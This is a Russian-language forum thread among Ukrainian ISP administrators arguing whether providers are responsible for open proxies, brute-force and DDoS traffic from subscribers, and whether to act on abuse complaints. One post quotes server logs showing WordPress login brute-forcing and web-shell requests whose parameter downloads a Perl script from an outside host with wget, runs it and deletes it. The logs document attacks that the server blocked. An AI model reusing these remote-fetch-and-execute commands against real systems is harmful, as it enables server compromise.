Проблемы с закрытием открытых http прокси по Украине

[tkapluk 908]

 

andryas, Вам приходит письмо о том, что с вашей сети идет атака на какой-то хост. Владелец хоста просит принять меры. Что вы в таких случаях делаете или будете делать?

Уведомляю абонента, предлагаю бесплатную помощь, при необходимости.

 

Если абузы приходят массово, а связаться с абонентом нет возможности - отключаю до выяснения.

 

 

При этом ты не отвечаешь на все абузы, и попадаешь в список плохих провайдеров на этом форуме. 

И пофиг отреагировал ты на абузу или нет, главное что не поговорил с ТС 

[Den_LocalNet 1 474]

писал мне ТС по поводу одного айпишника

уведомили абонента по смс - нет реакции

позвонили, сообщили и возможных последствиях, в ответ получили "ну и что? это мои проблемы"

что дальше?

 

теперь мы попадем в какой-то список человека с переизбытком ЧСВ?

по сути - пофиг...

[ttttt 195]

Если написать "У провайдера "Васятелеком" - открытые прокси, на контакт не идут", без публикации самого списка ипов, то есть шанс что админ Васятелекома напишет supportod, и они совместно урегулируют проблему.

Проблема в том, что нет никакой проблемы. А есть только чье-то, причем совершенно не экспертное, мнение.

 

Это как и с freebsd из-за их чертиков - религиозные фанатики любят писать злобные письма, с просьбой не адаптировать или отказаться от использования freebsd, потому что она олицетворяет зло и задевает их хрупкие чувства верующих

[Lynx100 90]

 

Должны ли Вы как владелец этого оборудования/ПО отвечать за брутфорс/ddos атаки и имеет ли право Вам кто-то предъявлять претензии?

Ни в коем случае. Отвечать должен преступник. Поиск преступника не моя работа.

 

+

 

и решать кто преступник а кто нет, соответственно и наказывать .... учитывая что притянуть наличие прокси к статье кодекса можна разве что только за уши .... и то если сильноооо постараться....

 

будет закон который будет запрещать открытые прокси- тогда будет о чем говорить ....

Відредаговано 2015-06-05 22:18:14 Lynx100

[Lynx100 90]

 вас предупредили, что эти сервисы у вас есть и объяснили возможные последствия,

 

1 Кто уполномочил предупреждать ?  какие функции и намерения имеет тот кто решил предупредить ? что должно произойти когда кто-то кто решил что кому-то что-то нельзя решил предупредить а на него положили ?

 

 

Затем с вашего IP идет брутфорс через прокси/атаки с использованием dns/ntp, это сознательное участие или несознательное? Должны ли Вы как владелец этого оборудования/ПО отвечать за брутфорс/ddos атаки и имеет ли право Вам кто-то предъявлять претензии?

 

 

 

2 . нет обязалова даже после предупреждения неизвестно кем принимать меры по решению проблемы о которой предупредил кто-то кто не наделен полномочиями кого-то предупреждать....

нет не должен.....  сомнительно что кто-то имеет законное право предъявлять претензии

 

 

ПС: поймите меня правильно ... я не поддерживаю  абонентов которые имеют открытый резолвер, прокси и т д  и не собираются реагировать, больше того эта проблема  тоже приносит головную боль и тоже интересует как правильно работать с абонентом в правовом русле не перегибая палку и не преступая черту за которую провайдер не имеет права заходить, но в тоже время решить этот вопрос....

[supportod 1]

Всем спасибо.

Я уже договорился с несколькими государственными организациями, они будут сами общаться с теми организациями, которые не принимают меры или не идут на контакт.

Как уже написали выше - last resort

 

Немного статистики - не реагируют очень крупные провайдеры - Велтон, Триолан, Киевстар и Вега.

Мелкие, не из Киева, худо-бедно реагируют.

А вот в киевских сетях бардак в RIPE записях - то телефоны неправильные, то контактные лица старые, то сети втихаря сдаются и не указывается арендатель.

Відредаговано 2015-06-16 08:54:45 supportod

[Den_LocalNet 1 474]

Робин Гуд отдыхает....

[karyon 48]

будет закон который будет запрещать открытые прокси- тогда будет о чем говорить ....

 

 

Все блин такие правильные, "мы не имеем права ничего сделать".

Зато если атака из нашей сети будет на нас!!, то пох на правила и права, всех нарушителей забанить, флудящие порты поотключать и сразу же вспоминаем нужные пункты в договоре в которых подобное описано...

 

Зато если ddos'ят других - "у нас нет прав вмешиватся в чужой трафик, карл"

[Phsm 19]

 

 

Зато если ddos'ят других - "у нас нет прав вмешиватся в чужой трафик, карл"

Дико плюсую этого товарища. Пофигизм "атакующих" провайдеров поражает. Зато когда атакуемый ресурс отрезает трафик с их сетей, тут же находят телефоны ДЦ и возмущаются: честных людей обижают.

[SBogdan 3]

Всем спасибо.

Я уже договорился с несколькими государственными организациями, они будут сами общаться с теми организациями, которые не принимают меры или не идут на контакт.

Как уже написали выше - last resort

 

Немного статистики - не реагируют очень крупные провайдеры - Велтон, Триолан, Киевстар и Вега.

Мелкие, не из Киева, худо-бедно реагируют.

А вот в киевских сетях бардак в RIPE записях - то телефоны неправильные, то контактные лица старые, то сети втихаря сдаются и не указывается арендатель.

 

Триолан всегда реагирует на жалобы. Вы просто предоставляете не достаточно оснований для блокировки.

Без оснований, никто никого отключать не будет.

 

Всем по барабану и благодарности за вашу деятельность не ждите.  

Відредаговано 2015-06-16 10:32:29 SBogdan

[andryas 1 059]

 

 

Всем по барабану и благодарности за вашу деятельность не ждите.  

 

Насколько я помню, обычно подобные проекты заканчиваются шантажом и поборами. Если ещё, не дай Бог, протащат (прикрываясь благими намерениями) закон, то ждите беды.

[John_Doe 301]

 

будет закон который будет запрещать открытые прокси- тогда будет о чем говорить ....

 

 

Все блин такие правильные, "мы не имеем права ничего сделать".

Зато если атака из нашей сети будет на нас!!, то пох на правила и права, всех нарушителей забанить, флудящие порты поотключать и сразу же вспоминаем нужные пункты в договоре в которых подобное описано...

 

Зато если ddos'ят других - "у нас нет прав вмешиватся в чужой трафик, карл"

 

Вы не путайте факт ддоса и возможность такового, о которой вещает ТС с желанием все позакрывать что его пугает. С такой логикой всем нужно инет отключить глобально, ибо это потенциально огромное поле для кучи правонарушений разной степени тяжести

[supportod 1]

Эти прокси уже давно в списках открытых прокси гуляют по интернету и они активно эксплуатируется, кто не верит - подключитесь и послушайте траффик.

Еще крупные компании имеют запас по полосе внешних каналов, для них входящий и исходящий DDoS малозаметны.

Відредаговано 2015-06-16 14:15:21 supportod

[SBogdan 3]

Эти прокси уже давно в списках открытых прокси гуляют по интернету и они активно эксплуатируется, кто не верит - подключитесь и послушайте траффик.

 

И что? Вам от этого холодно или жарко? Следите за своими сетями, в чужой огород не лезьте.

[supportod 1]

 

Эти прокси уже давно в списках открытых прокси гуляют по интернету и они активно эксплуатируется, кто не верит - подключитесь и послушайте траффик.

 

И что? Вам от этого холодно или жарко? Следите за своими сетями, в чужой огород не лезьте.

 

 

Будьте добры представиться, какую AS вы представляете?

Відредаговано 2015-06-18 11:26:44 supportod

[SBogdan 3]

 

 

Эти прокси уже давно в списках открытых прокси гуляют по интернету и они активно эксплуатируется, кто не верит - подключитесь и послушайте траффик.

 

И что? Вам от этого холодно или жарко? Следите за своими сетями, в чужой огород не лезьте.

о

 

Будьте добры представиться, какую AS вы представляете?

 

 

Роутим в лесу, а лес там.... ----> или там <---- А всё почему? Потому что.

 

Будем и дальше продолжать общаться вопросом на вопрос?

[black_13 4]

О, я смотрю тут много теоретиков собралось. А давайте ближе к практике!

Вот живой актуальный пример, есть ip  178.137.163.42 с него сыпется мне на web сервак брутфорс вот такого вида:

2015/07/10 08:08:40 [error] 10037#0: *3012 access forbidden by rule, client: 178.137.163.42, server: my.blog.ua, request: "POST http://my.blog.ua/wp-login.php HTTP/1.1", host: "my.blog.ua"
2015/07/10 08:10:48 [error] 10037#0: *3016 access forbidden by rule, client: 178.137.163.42, server: my.blog.ua, request: "POST http://my.blog.ua/wp-login.php HTTP/1.1", host: "my.blog.ua"
2015/07/10 08:12:59 [error] 10037#0: *3032 access forbidden by rule, client: 178.137.163.42, server: my.blog.ua, request: "POST http://my.blog.ua/wp-login.php HTTP/1.1", host: "my.blog.ua"
2015/07/10 08:15:11 [error] 10037#0: *3038 access forbidden by rule, client: 178.137.163.42, server: my.blog.ua, request: "POST http://my.blog.ua/wp-login.php HTTP/1.1", host: "my.blog.ua"
2015/07/10 08:17:25 [error] 10037#0: *3040 access forbidden by rule, client: 178.137.163.42, server: my.blog.ua, request: "POST http://my.blog.ua/wp-login.php HTTP/1.1", host: "my.blog.ua"
2015/07/10 08:19:45 [error] 10037#0: *3054 access forbidden by rule, client: 178.137.163.42, server: my.blog.ua, request: "POST http://my.blog.ua/wp-login.php HTTP/1.1", host: "my.blog.ua"

легко выяснил что провайдер этого уе*на (нехорошего человека) - киевстар

Написал на абус .... вторые сутки реакции ноль целых ноль десятых.

P.S. Не обращайте внимание на промежутки между запросами, чувак помещен в "карантин", а там сильно скорость зарезана ... на самом деле запросов по несколько в сек валится.

[John_Doe 301]

И что? Вам религия не позволяет его фаирволом резать? Для этих целей есть куча софта чтобы делать ето автоматом, fail2ban например

[dr.ghost 2]

Вот интересно сопоставить, если чуваку за рулём, другие водители подскажут, что у него что то капает, на масло похоже в машине, или спущенное колесо, или вообще глушак заде волочется, та как ему поступить? Послать их и сказать моё дело еду туда > или < туда. Части окружающих НЕ всё равно, такой автомобиль предоставляет опасность и он не в пустыне. 

з.ы. Правильное дело ТС затеял, есть много сетей где админы могут быть не в курсе.

[Den_LocalNet 1 474]

Вот интересно сопоставить, если чуваку за рулём, другие водители подскажут, что у него что то капает, на масло похоже в машине, или спущенное колесо, или вообще глушак заде волочется, та как ему поступить? Послать их и сказать моё дело еду туда > или < туда. Части окружающих НЕ всё равно, такой автомобиль предоставляет опасность и он не в пустыне. 

з.ы. Правильное дело ТС затеял, есть много сетей где админы могут быть не в курсе.

чем и кому угрожает бурутфорсер из примера выше?

[tkapluk 908]

 

 

Вот живой актуальный пример, есть ip  178.137.163.42 с него сыпется мне на web сервак брутфорс вот такого вида:

 

Считай это бонус к опенсорс цмc. С ростом популярности сайта ты не будешь успевать отслеживать айпишки с которых идут запросы. Гугли как спрятать wp-login.php и вообще про безопастность Вордпреса. 

[dr.ghost 2]

 

Вот интересно сопоставить, если чуваку за рулём, другие водители подскажут, что у него что то капает, на масло похоже в машине, или спущенное колесо, или вообще глушак заде волочется, та как ему поступить? Послать их и сказать моё дело еду туда > или < туда. Части окружающих НЕ всё равно, такой автомобиль предоставляет опасность и он не в пустыне. 

з.ы. Правильное дело ТС затеял, есть много сетей где админы могут быть не в курсе.

чем и кому угрожает бурутфорсер из примера выше?

 

На этот вопрос можно ответить если понять зачем ему это.

з.ы. Любой брут - благое дело?

з.ы.ы. Некоторые провайдеры отключают за излишний броадкаст (PPtP клиент генерит).

[Den_LocalNet 1 474]

 

 

Вот интересно сопоставить, если чуваку за рулём, другие водители подскажут, что у него что то капает, на масло похоже в машине, или спущенное колесо, или вообще глушак заде волочется, та как ему поступить? Послать их и сказать моё дело еду туда > или < туда. Части окружающих НЕ всё равно, такой автомобиль предоставляет опасность и он не в пустыне. 

з.ы. Правильное дело ТС затеял, есть много сетей где админы могут быть не в курсе.

чем и кому угрожает бурутфорсер из примера выше?

 

На этот вопрос можно ответить если понять зачем ему это.

з.ы. Любой брут - благое дело?

з.ы.ы. Некоторые провайдеры отключают за излишний броадкаст (PPtP клиент генерит).

 

т.е. ответа у вас нет?

 

как по мне наличие доморощенных брутеров это даже хорошо: работает как "естественный отбор" для доморощенных админов

если ты не побеспокоился о безопасности (читай не поставил дома надежные двери с надежным замком) то кто тебе редиска?

т.е. если твой любимый пароль 123456 или qwerty то кто тебе доктор?

[dr.ghost 2]

 

 

 

Вот интересно сопоставить, если чуваку за рулём, другие водители подскажут, что у него что то капает, на масло похоже в машине, или спущенное колесо, или вообще глушак заде волочется, та как ему поступить? Послать их и сказать моё дело еду туда > или < туда. Части окружающих НЕ всё равно, такой автомобиль предоставляет опасность и он не в пустыне. 

з.ы. Правильное дело ТС затеял, есть много сетей где админы могут быть не в курсе.

чем и кому угрожает бурутфорсер из примера выше?

 

На этот вопрос можно ответить если понять зачем ему это.

з.ы. Любой брут - благое дело?

з.ы.ы. Некоторые провайдеры отключают за излишний броадкаст (PPtP клиент генерит).

 

т.е. ответа у вас нет?

 

как по мне наличие доморощенных брутеров это даже хорошо: работает как "естественный отбор" для доморощенных админов

если ты не побеспокоился о безопасности (читай не поставил дома надежные двери с надежным замком) то кто тебе редиска?

т.е. если твой любимый пароль 123456 или qwerty то кто тебе доктор?

 

1.Почему же нет ответа? Он есть. Только у каждого свой. Мой ответ: Не вижу не чего хорошо в том что какой то олень (малолетний хацкер) пытается подобрать пароль. Этот олень не понимает что его забанят на второй или третей попытке. Однако ему наплевать, что за его адресом (он ведь за проксей или натом) могут быть и другие валидные пользователи, которые из-за него не смогут попасть на ресурс. А рассчитывает он, на не осмотрительного/опытного админа/пользователя - от этого они не становятся плохими. Многие выдающиеся люди не уделяют этому должного внимания.

2.Ну тогда можно предположить, что уличный бандитизм - тоже хорошо. Не обучен себя защитить - кто тебе редиска? Это типа явление санитары леса. Только если уже говорить о санитарах леса, волках к примеру, они нападают чтобы прокормить себя, а не ради забавы. А люди в бандитизме (явление) могут найти и другой способ прокормить себя. Как то так.

[black_13 4]

И что? Вам религия не позволяет его фаирволом резать? Для этих целей есть куча софта чтобы делать ето автоматом, fail2ban например

 

Ну вашу позицию я уже понял - типа это проблемы админа, решай на уровне локалхоста

Когда вам влетит в 3G девайс надцать гиг подобного трафика, возможно мнение поменяется

Пока ок. Людина людинi вовк - это старый известный принцип

 

 

Вот живой актуальный пример, есть ip  178.137.163.42 с него сыпется мне на web сервак брутфорс вот такого вида:

 

Считай это бонус к опенсорс цмc. С ростом популярности сайта ты не будешь успевать отслеживать айпишки с которых идут запросы. Гугли как спрятать wp-login.php и вообще про безопастность Вордпреса. 

 

 

Админка WP-шки спрятана, как видите - ответ 403 "access forbidden"

С самописами обычно еще хуже Мое ИМХО конечноже.

Что касается CMS, не CMS и тп, данный пример просто как иллюстрация бездействия и наплевательства киевстара, конечно же есть масса других веселых записей в логах. Думаю что у каждого из вас вагон таких примеров, достаточно просто открыть error.log на веб сервере и полистать

Вот еще веселые ребята, для тех кто любит побуквоедить по поводу wp-login.php

[07/Jul/2015:02:43:21 +0300] - 91.191.144.110 - - "GET /images/jdownloads/screenshots/myluph.php?cmd=wget%20http://www.federacia.by/xmlrpc/includes/.../os.txt;perl%20os.txt;perl%20os.txt;perl%20os.txt;perl%20os.txt;perl%20os.txt;rm%20-rf%20os.* HTTP/1.1" 403 405 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "-"[07/Jul/2015:02:43:36 +0300] - 91.191.144.110 - - "GET /archives/images/jdownloads/screenshots/myluph.php?cmd=wget%20http://www.federacia.by/xmlrpc/includes/.../os.txt;perl%20os.txt;perl%20os.txt;perl%20os.txt;perl%20os.txt;perl%20os.txt;rm%20-rf%20os.* HTTP/1.1" 403 405 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "-"
[07/Jul/2015:02:44:11 +0300] - 91.191.144.110 - - "GET /images/jdownloads/screenshots/.libs.up.php.j?cmd=wget%20http://www.federacia.by/xmlrpc/includes/.../os.txt;perl%20os.txt;perl%20os.txt;perl%20os.txt;perl%20os.txt;perl%20os.txt;rm%20-rf%20os.* HTTP/1.1" 403 405 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "-"
[07/Jul/2015:02:44:26 +0300] - 91.191.144.110 - - "GET /archives/images/jdownloads/screenshots/.libs.up.php.j?cmd=wget%20http://www.federacia.by/xmlrpc/includes/.../os.txt;perl%20os.txt;perl%20os.txt;perl%20os.txt;perl%20os.txt;perl%20os.txt;rm%20-rf%20os.* HTTP/1.1" 403 405 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "-"

На самом деле мне как админу плевать на таких какеров, но до определенного момента. А вот не до смеха становится, когда такого траффика становится много и с разных хостов. Тогда уж извините - на уровне локалхоста этой проблемы не решить

Мне печально сознавать что в Украине нету законодательной базы и рабочих механизмов которая бы защищала мои интересы как клиента в данном вопросе